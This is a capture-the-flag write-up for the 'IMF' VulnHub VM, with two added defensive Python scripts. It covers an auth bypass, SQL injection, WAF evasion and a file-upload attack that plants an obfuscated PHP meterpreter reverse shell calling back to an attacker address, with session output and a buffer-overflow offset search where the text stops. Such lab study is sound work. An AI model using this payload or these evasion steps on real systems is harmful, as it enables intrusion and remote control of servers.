Write-Up: IMF: 1 – ArcSecurity>NET


Okay, so let's get started on a VulnHub-hosted CTF target...

Welcome to "IMF", my first Boot2Root virtual machine. IMF is an intelligence agency that you must hack to get all flags and ultimately root. The flags start off easy and get harder as you progress. Each flag contains a hint to the next flag. I hope you enjoy this VM and learn something.

Difficulty: Beginner/Moderate

Can contact me at: geckom at redteamr dot com or on Twitter: @g3ck0m

so step one ... find the target and give it a once over for open ports.

root@NetHunter:~# nmap -A -T5 192.168.1.14

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-12 16:51 MST
Nmap scan report for 192.168.1.14
Host is up (0.00028s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: IMF - Homepage
MAC Address: 08:00:27:A1:F5:E7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.2, Linux 3.16 - 4.6, Linux 3.2 - 4.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.1.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds

It looks like the only attack vector we have available at first glance is port 80.

[+] Flag #2

So poking around the web page, the first flag I run across is hidden in the strangely named JavaScript files used by the site.

<script src="js/ZmxhZzJ7YVcxbVl.js"></script>
<script src="js/XUnRhVzVwYzNS.js"></script>
<script src="js/eVlYUnZjZz09fQ==.min.js"></script>

Putting all the names together, while removing the markup and file extensions, gives us what looks like a base64 string:

ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==

Decoding the string:

root@NetHunter:~# echo "ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==" | base64 -d
flag2{aW1mYWRtaW5pc3RyYXRvcg==}

After decoding the string, it looks like we may have a username or password?! Seems too easy...

root@NetHunter:~# echo "aW1mYWRtaW5pc3RyYXRvcg==" | base64 -d
imfadministrator

Trying some light brute forcing with different variations yields no luck, though, so let's look for flag #1...

[+] Flag #1

Okay, so after some digging around, along with some steganographic detection work on all the images on the site with no luck, I went back to reviewing the source code, fearing I may have overlooked something. Sure enough, the source code of the page has some goodies!

<div class="container">
<!-- flag1{YWxsdGhlZmlsZXM=} -->
<div class="service-wrapper">

root@NetHunter:~/Downloads# echo "YWxsdGhlZmlsZXM=" | base64 -d
allthefiles
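
As an added example (not part of the original write-up and not the VM author's code), the Python script below automates the check used for flags 1 and 2: it pulls HTML comments and script file names out of a page, joins consecutive names, and peels nested base64 layers. The sample markup is the fragment quoted above; all function names are my own, and the same check works as a pre-publish scan for values left in client-side source.

```python
import base64
import binascii
import re

# Sample input: the markup fragments quoted in this write-up.
SAMPLE_HTML = """
<script src="js/ZmxhZzJ7YVcxbVl.js"></script>
<script src="js/XUnRhVzVwYzNS.js"></script>
<script src="js/eVlYUnZjZz09fQ==.min.js"></script>
<div class="container">
<!-- flag1{YWxsdGhlZmlsZXM=} -->
<div class="service-wrapper">
"""

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")


def try_b64(token):
    """Decode token if it is well-formed base64 of printable ASCII, else None."""
    if len(token) % 4:
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, ValueError):
        return None
    return text if text.isprintable() else None


def peel(text, max_depth=4):
    """Decode the first base64 token in text, then repeat on the result."""
    layers = []
    for _ in range(max_depth):
        decoded = None
        for token in B64_TOKEN.findall(text):
            decoded = try_b64(token)
            if decoded:
                break
        if not decoded:
            break
        layers.append(decoded)
        text = decoded
    return layers


def scan(html):
    """Return (source, raw value, decoded layers) for comments and script names."""
    findings = []
    for comment in re.findall(r"<!--(.*?)-->", html, re.S):
        layers = peel(comment)
        if layers:
            findings.append(("comment", comment.strip(), layers))
    # Strip directories and .js/.min.js, then test every run of consecutive
    # names, because the encoded value may be split across several files.
    names = [re.sub(r"(\.min)?\.js$", "", src.rsplit("/", 1)[-1])
             for src in re.findall(r'<script[^>]+src="([^"]+)"', html)]
    best = ""
    for i in range(len(names)):
        for j in range(i + 1, len(names) + 1):
            run = "".join(names[i:j])
            if len(run) > len(best) and peel(run):
                best = run
    if best:
        findings.append(("script-names", best, peel(best)))
    return findings


if __name__ == "__main__":
    for source, raw, layers in scan(SAMPLE_HTML):
        print(source, raw, "->", " -> ".join(layers))
```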

[+] Flag 3

So moving on, I would be remiss if I did not give dirb a workout. It yielded no great or interesting results on the quick tests, but it occurs to me that this 'imfadministrator' may be a web directory...

and sure enough I am greeted with a login screen!

Checking out the source to get some idea of what we are working with, we find something interesting.

<!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger -->

so looks like 'Roger' hard-coded the password; but HTF did he do that?

... so this honestly took me a bit to figure out, but eventually my efforts led me to exploiting the PHP function (not sure which) that handles the comparison of the password portion of the POST data in the login logic. It turns out this function is vulnerable when the form input's 'name' attribute has '[]' appended to it...

So using Roger's username (taken from his email on the contact page) and simply using Firebug to append '[]' to the name attribute of the password field, it looks like we have successfully exploited the authentication mechanism! And boom, Flag 3...

flag3{Y29udGludWVUT2Ntcw==}
Welcome, rmichaels
IMF CMS
root@NetHunter:~# echo "Y29udGludWVUT2Ntcw==" | base64 -d
continueTOcms

[+] Flag 4

After visiting the cms section of the website looks like we might have hit some pay dirt in getting into the system ...

it looks like the cms.php page takes a url query and displays the page... After looking at the original query string I decide to throw a bone at it, and looks like we have some luck! seems we have a MySQL powered CMS that may be vulnerable to SQLi.

http://192.168.1.14/imfadministrator/cms.php?pagename=home
 swapped with
http://192.168.1.14/imfadministrator/cms.php?pagename=%27

Warning: mysqli_fetch_row() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/imfadministrator/cms.php on line 29

So I decide to use 'sqlmap' instead of manual testing purely for saving time... and looks like we have a successful SQLi exploitation that yields some interesting information; seems we have another page in the CMS that does not have a link available...

Database: admin
Table: pages
[4 entries]
+----+----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | pagename             | pagedata                                                                                                                                                              |
+----+----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1  | upload               | Under Construction.                                                                                                                                                   |
| 2  | home                 | Welcome to the IMF Administration.                                                                                                                                    |
| 3  | tutorials-incomplete | Training classrooms available. <br /><img src="./images/whiteboard.jpg"><br /> Contact us for training.                                                               |
| 4  | disavowlist          | <h1>Disavowed List</h1><img src="./images/redacted.jpg"><br /><ul><li>*********</li><li>****** ******</li><li>*******</li><li>**** ********</li></ul><br />-Secretary |
+----+----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

[+] Flag 4

After checking out the newly found 'tutorials-incomplete' page looks like the primary

Looks like we have a QR bar code... giving it a scan with my phone - BINGO!

flag4{dXBsb2Fkcjk0Mi5waHA=}
root@NetHunter:~# echo "dXBsb2Fkcjk0Mi5waHA=" | base64 -d
uploadr942.php

Looks like we have another page to check out...

[+] Flag 5

It looks like we may be getting close to the end of the game here... we have an upload form. After checking it out thoroughly I have deduced that you can't upload certain file types, but I did have success uploading a GIF image... Then, after some more observation trying to figure this out, I noticed that after a successful upload there are some artifact HTML comments in the source code. Having seen and built file uploading systems before, I know that sometimes the developer will have the uploaded file renamed (so as not to cause errors if two files have the same name) and, for debugging, will output the new name in some way during the development process... With that in mind, is this a filename?!

<!-- 3261dafa822b -->
 <!-- 032b44600d91 -->
 <!-- ba4fb7f9de5c -->
 <!-- 566e3a80404d -->
 <!-- 3bf21765c311 -->
 <!-- 68fe756a5a8e -->
 <!-- d7bf444ca7a0 -->
 <!-- 1eaf5abd1259 -->
 <!-- 3f0f8fc354b6 -->
 <!-- 59c70f672c9e -->
 <!-- 6aca40a021a4 -->
 <!-- 71f3e7beb1b8 -->
 <!-- abf5e1695a51 -->
 <!-- b2bae22f7cbd -->
 <!-- 4d1896fbe035 -->

A little experimenting and looks like we got something! While looking into one of my uploaded files it seems the server actually attempts to process the content of the file!

http://192.168.56.101/imfadministrator/uploads/4d1896fbe035.gif

in a spitball attempt to get a foothold in the system I try the following

GIF98

<?php
 phpinfo()
?>

And we have an attack vector! So obviously I quickly copy and paste some code from one of my php webshells but no love, seems there is a WAF and we get the following error.

Error: CrappyWAF detected malware. Signature: fopen php function detected

Doing some poking around I found that the WAF does not mind the file_put_contents() function...

GIF98

<?php
 file_put_contents("test.txt","hello there");
?>

File successfully uploaded. and looks like our file is there and waiting!!

http://192.168.56.101/imfadministrator/uploads/test.txt
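
Added example, not the VM's code: the first function below models the filter behaviour observed in this section (a "GIF" prefix check plus a function-name blocklist; only the fopen signature is confirmed by the page, the rest is an assumption), and the second is a stricter content check that rejects both uploads shown above. The function names and the samples marked as constructed are mine.

```python
import re

GIF_MAGIC = (b"GIF87a", b"GIF89a")
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

# The two uploads as shown in this section.
PAGE_UPLOAD_PHPINFO = b"GIF98\n\n<?php\n phpinfo()\n?>\n"
PAGE_UPLOAD_WRITE = b'GIF98\n\n<?php\n file_put_contents("test.txt","hello there");\n?>\n'
# Constructed samples: a call the WAF signature names, and a minimal 1x1 GIF.
FOPEN_SAMPLE = b'GIF98\n<?php fopen("x", "r"); ?>\n'
MINIMAL_GIF = bytes.fromhex(
    "474946383961" "0100" "0100" "80" "00" "00"   # header + screen descriptor
    "000000" "ffffff"                             # 2-entry global colour table
    "21f904" "01000000" "00"                      # graphic control extension
    "2c" "00000000" "01000100" "00"               # image descriptor
    "02" "02" "4401" "00"                         # LZW code size + data sub-block
    "3b"                                          # trailer
)


def blocklist_filter(data, blocked=(b"fopen",)):
    """Assumed model of the observed filter: loose prefix + name blocklist."""
    if not data.startswith(b"GIF"):
        return False, "not an image"
    for name in blocked:
        if name in data:
            return False, "signature: " + name.decode()
    return True, "accepted"


def strict_gif_check(data):
    """Accept only a structurally complete GIF that carries no PHP open tag."""
    if data[:6] not in GIF_MAGIC:
        return False, "bad magic"
    if PHP_OPEN_TAG.search(data):
        return False, "php open tag in image data"
    if len(data) < 13:
        return False, "truncated header"
    pos = 13
    if data[10] & 0x80:                        # global colour table present
        pos += 3 * (2 << (data[10] & 0x07))
    while pos < len(data):
        block = data[pos]
        if block == 0x3B:                      # trailer must be the last byte
            if pos == len(data) - 1:
                return True, "ok"
            return False, "data after trailer"
        if block == 0x21:                      # extension: introducer + label
            pos += 2
        elif block == 0x2C:                    # image descriptor
            if pos + 10 > len(data):
                return False, "truncated image descriptor"
            packed = data[pos + 9]
            pos += 10
            if packed & 0x80:                  # local colour table present
                pos += 3 * (2 << (packed & 0x07))
            pos += 1                           # LZW minimum code size
        else:
            return False, "unknown block"
        while pos < len(data) and data[pos] != 0:
            pos += data[pos] + 1               # skip one data sub-block
        pos += 1                               # zero-length terminator
    return False, "missing trailer"


if __name__ == "__main__":
    for sample in (PAGE_UPLOAD_PHPINFO, PAGE_UPLOAD_WRITE, FOPEN_SAMPLE, MINIMAL_GIF):
        print(blocklist_filter(sample), strict_gif_check(sample))
```

Content checks like this are only a second layer; the underlying problem shown above is that files under uploads/ are handed to the PHP interpreter at all.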

And after some serious trial and error I finally got a payload past the upload page... Essentially I used 'msfvenom' to generate a PHP meterpreter payload, then by layering encodings (urlencode() and str_rot13()) I was able to get a backdoor installed on the target.

root@NetHunter:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444

GIF98

<?php

$payload = <<<ENC
%2F%2A%3C%3Fcuc+%2F%2A%2A%2F+reebe_ercbegvat%280%29%3B+%24vc+%3D+%27192.168.56.1%27%3B+%24cbeg+%3D+4444%3B+vs+%28%28%24s+%3D+%27fgernz_fbpxrg_pyvrag%27%29+%26%26+vf_pnyynoyr%28%24s%29%29+%7B+%24f+%3D+%24s%28%22gpc%3A%2F%2F%7B%24vc%7D%3A%7B%24cbeg%7D%22%29%3B+%24f_glcr+%3D+%27fgernz%27%3B+%7D+ryfrvs+%28%28%24s+%3D+%27sfbpxbcra%27%29+%26%26+vf_pnyynoyr%28%24s%29%29+%7B+%24f+%3D+%24s%28%24vc%2C+%24cbeg%29%3B+%24f_glcr+%3D+%27fgernz%27%3B+%7D+ryfrvs+%28%28%24s+%3D+%27fbpxrg_perngr%27%29+%26%26+vf_pnyynoyr%28%24s%29%29+%7B+%24f+%3D+%24s%28NS_VARG%2C+FBPX_FGERNZ%2C+FBY_GPC%29%3B+%24erf+%3D+%40fbpxrg_pbaarpg%28%24f%2C+%24vc%2C+%24cbeg%29%3B+vs+%28%21%24erf%29+%7B+qvr%28%29%3B+%7D+%24f_glcr+%3D+%27fbpxrg%27%3B+%7D+ryfr+%7B+qvr%28%27ab+fbpxrg+shapf%27%29%3B+%7D+vs+%28%21%24f%29+%7B+qvr%28%27ab+fbpxrg%27%29%3B+%7D+fjvgpu+%28%24f_glcr%29+%7B+pnfr+%27fgernz%27%3A+%24yra+%3D+sernq%28%24f%2C+4%29%3B+oernx%3B+pnfr+%27fbpxrg%27%3A+%24yra+%3D+fbpxrg_ernq%28%24f%2C+4%29%3B+oernx%3B+%7D+vs+%28%21%24yra%29+%7B+qvr%28%29%3B+%7D+%24n+%3D+hacnpx%28%22Ayra%22%2C+%24yra%29%3B+%24yra+%3D+%24n%5B%27yra%27%5D%3B+%24o+%3D+%27%27%3B+juvyr+%28fgeyra%28%24o%29+%3C+%24yra%29+%7B+fjvgpu+%28%24f_glcr%29+%7B+pnfr+%27fgernz%27%3A+%24o+.%3D+sernq%28%24f%2C+%24yra-fgeyra%28%24o%29%29%3B+oernx%3B+pnfr+%27fbpxrg%27%3A+%24o+.%3D+fbpxrg_ernq%28%24f%2C+%24yra-fgeyra%28%24o%29%29%3B+oernx%3B+%7D+%7D+%24TYBONYF%5B%27zftfbpx%27%5D+%3D+%24f%3B+%24TYBONYF%5B%27zftfbpx_glcr%27%5D+%3D+%24f_glcr%3B+riny%28%24o%29%3B+qvr%28%29%3B%0A
ENC;

file_put_contents("backdoor.gif","GIF98 <?php" . str_rot13(urldecode($payload)) . "?>");

print_r(scandir("."));

phpinfo();
 ?>

I threw a scandir() in there just to list the files in the uploads directory as a check for success...

then after visiting the target URL to my uploaded backdoor I was greeted with a meterpreter shell!

http://192.168.56.101/imfadministrator/uploads/backdoor.gif
[*] Sending stage (33986 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:49226) at 2017-02-13 10:44:39 -0700

msf exploit(handler) >
msf exploit(handler) >
msf exploit(handler) >
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
 Server username: www-data (33)
 meterpreter > sysinfo
 Computer    : imf
 OS          : Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64
 Meterpreter : php/linux
 meterpreter >
meterpreter > cat flag5_abc123def.txt
 flag5{YWdlbnRzZXJ2aWNlcw==}

root@NetHunter:~# echo "YWdlbnRzZXJ2aWNlcw==" | base64 -d 
agentservices

[+] Flag 6

Poking around I run across an interesting executable as well as a file 'access_codes'

ls /usr/local/bin
 access_codes
 agent
 cat /usr/local/bin/access_codes
 SYN 7482,8279,9467

checking out the agent executable with ltrace and strings we may have a code to try to get into the program...

latrace agent
 /bin/sh: 102: latrace: not found
 ltrace agent
 __libc_start_main(0x80485fb, 1, 0xffe3c264, 0x8048970  ___ __  __ ___
 |_ _|  \/  | __|  Agent
 | || |\/| | _|   Reporting
 |___|_|  |_|_|    System

Agent ID :  <unfinished ...>
 setbuf(0xf77b8d60, 0)                            = <void>
 asprintf(0xffe3c198, 0x80489f0, 0x2ddd984, 0xf76200ec) = 8
 puts("  ___ __  __ ___ ")                        = 18
 puts(" |_ _|  \\/  | __|  Agent")                = 25
 puts("  | || |\\/| | _|   Reporting")            = 29
 puts(" |___|_|  |_|_|    System\n")              = 27
 printf("\nAgent ID : ")                          = 12
 fgets(
 Invalid Agent ID
 "\n", 9, 0xf77b85a0)                       = 0xffe3c19e
 strncmp("\n", "48093572", 8)                     = -1
 puts("Invalid Agent ID ")                        = 18

And it works! We now have access to the Agent Reporting System; however, it seems to be a false victory, as there doesn't seem to be much use for it...

agent
 ___ __  __ ___
 |_ _|  \/  | __|  Agent
 | || |\/| | _|   Reporting
 |___|_|  |_|_|    System

Agent ID : 48093572
 Login Validated
 Main Menu:
 1. Extraction Points
 2. Request Extraction
 3. Submit Report
 0. Exit
 Enter selection:

After spending quite some time looking around the system and trying a few kernel exploits for privilege escalation, I decide to backtrack a little... Earlier, using 'netstat', I noticed that one of the listening ports, port 7788, did not show as open in my initial nmap scan. While poking around I also noticed that knockd was running, and on top of that the files found in the /usr/local/bin directory contained what looks like a knocking sequence...

root@NetHunter:~# nmap -T5 --open 192.168.56.101 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-13 12:30 MST 
Nmap scan report for 192.168.56.101
Host is up (0.00082s latency).
Not shown: 999 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE 
80/tcp open  http 

MAC Address: 08:00:27:A1:F5:E7 (Oracle VirtualBox virtual NIC) 
Nmap done: 1 IP address (1 host up) scanned in 2.85 seconds 

root@nethunterarch:~# knock 192.168.56.101 7482:tcp 8279:tcp 9467:tcp -v 
hitting tcp 192.168.56.101:7482 
hitting tcp 192.168.56.101:8279 
hitting tcp 192.168.56.101:9467 

root@nethunterarch:~# nmap -T5 --open -p 7788 192.168.56.101 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-13 12:33 MST 
Nmap scan report for 192.168.56.101
Host is up (0.00020s latency).
PORT     STATE SERVICE 
7788/tcp open  unknown 
MAC Address: 08:00:27:A1:F5:E7 (Oracle VirtualBox virtual NIC) 
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds

and looks like that was it! now connecting to the port and seems we get the output from the 'agent' program we were checking out earlier...

root@nethunterarch:~# nc 192.168.56.101 7788
 ___ __  __ ___
 |_ _|  \/  | __|  Agent
 | || |\/| | _|   Reporting
 |___|_|  |_|_|    System

Agent ID :

My first thought now is that our earlier victory may not have been false after all... Taking a quick peek at the running processes now that I have the agent program running on my end, it seems the agent program is running as root, so we may be able to exploit it with a buffer overflow. So let's start tearing this down...

First I grabbed a local copy of the agent executable, then using pattern_create.rb I generated a random 2000 bit string and successfully broke the agent program

root@nethunterarch:/usr/share/webshells/php# ./agent
 ___ __  __ ___
 |_ _|  \/  | __|  Agent
 | || |\/| | _|   Reporting
 |___|_|  |_|_|    System

Agent ID : 48093572
 Login Validated
 Main Menu:
 1. Extraction Points
 2. Request Extraction
 3. Submit Report
 0. Exit
 Enter selection: 3

Enter report update: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn
9Co0Co1Co2Co3Co4Co5Co
 Report: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co
3Co4Co5Co
 Submitted for review.
 Segmentation fault

checking out our registers we can snag EAX and our crashpoint.

Program received signal SIGSEGV, Segmentation fault.
 0x41366641 in ?? ()
 (gdb) info registers
 eax            0x8048563    -11900
 ecx            0xfbad0087    -72548217
 edx            0xf7fa8870    -134576016
 ebx            0x0    0
 esp            0xffffd230    0xffffd230
 ebp            0x35664134    0x35664134
 esi            0x1    1
 edi            0xf7fa7000    -134582272
 eip            0x41366641    0x41366641
 eflags         0x10282    [ SF IF RF ]
 cs             0x23    35
 ss             0x2b    43
 ds             0x2b    43
 es             0x2b    43
 fs             0x0    0
 gs             0x63    99

We will need this info later ... now to find our offset

root@nethunterarch:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2000 -q 41366641
[*] Exact match at offset 168
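
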